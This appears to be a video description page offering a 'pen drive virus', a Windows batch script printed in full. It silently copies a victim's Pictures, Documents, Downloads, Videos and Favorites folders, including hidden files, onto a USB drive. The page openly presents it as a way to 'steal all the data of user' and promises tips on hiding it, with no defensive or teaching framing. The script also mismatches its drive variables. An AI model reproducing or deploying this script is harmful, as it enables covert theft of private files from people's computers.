Creating a simple pen drive virus to copy all the file of user using text editor.|100% Working|

Опубликовано: 20 Июнь 2026
на канале: Arics Ven
144
6

In this video i am going to show you, how to create a simple pen drive virus that will steal all the data of user when inserted in pc . Watch the video till end to know the trick of hiding the virus or any folder so no one can get access to it.the virus code is given below :-
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\videos"
%backupcmd% "%USERPROFILE%\Downloads" "%drive%\all\Downloads"
%backupcmd% "%USERPROFILE%\Documents" "%drive%\all\Documents"
@echo off
cls
save the file with .bat extension.
#virus#coding#batch file#data stealing
#start coding#startupwithcode#learn batch coding#batch coding#virus programming